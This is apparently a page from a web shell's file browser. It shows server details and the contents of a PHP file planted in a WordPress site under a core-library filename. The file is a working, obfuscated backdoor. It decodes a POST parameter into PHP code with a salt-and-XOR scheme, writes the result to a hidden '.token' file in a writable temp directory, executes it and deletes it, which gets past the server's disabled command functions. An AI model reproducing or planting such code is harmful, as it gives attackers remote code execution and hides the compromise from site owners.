HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/wp-includes/sodium_compat/src/Core/lib_options_add.php
<?php

if(isset($_POST["\x6F\x62j"]) ? true : false){
	$k = array_filter([ini_get("upload_tmp_dir"), getcwd(), session_save_path(), getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/tmp"]);
	$entry = $_POST["\x6F\x62j"];
	 $entry   =explode  	( "."		,  $entry)   ;		
	$marker = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
            $z = 0;
    
            $__tmp = $entry;
            while ($v3 = array_shift($__tmp)) {
                $chS = ord($salt[$z % $lenS]);
                $d = ((int)$v3 - $chS - ($z % 10)) 	^  12;
                $marker .= chr($d);
                $z++;	}
	while ($ent = array_shift($k)) {
    		if (max(0, is_dir($ent) * is_writable($ent))) {
    $ptr = sprintf("%s/.token", $ent);
    if (file_put_contents($ptr, $marker)) {
	require $ptr;
	unlink($ptr);
	exit;
}
}
}
}